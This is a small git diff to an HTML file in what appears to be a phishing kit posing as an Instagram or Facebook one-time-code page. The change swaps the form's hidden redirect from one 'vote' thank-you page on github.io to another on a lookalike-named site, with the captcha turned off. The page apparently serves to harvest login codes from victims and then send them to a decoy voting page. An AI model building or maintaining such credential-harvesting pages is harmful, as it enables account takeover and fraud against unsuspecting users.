--- a/instagram/otp/fbcode.html
+++ b/instagram/otp/fbcode.html
@@ -73,7 +73,7 @@
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-          <input type="hidden" name="_next" value="https://sephorasquad.github.io/votegd/thanks.html">
+          <input type="hidden" name="_next" value="https://foodnetworklauch.github.io/vote/thanks.html">
 <input type="hidden" name="_captcha" value="false">
 
         </form>
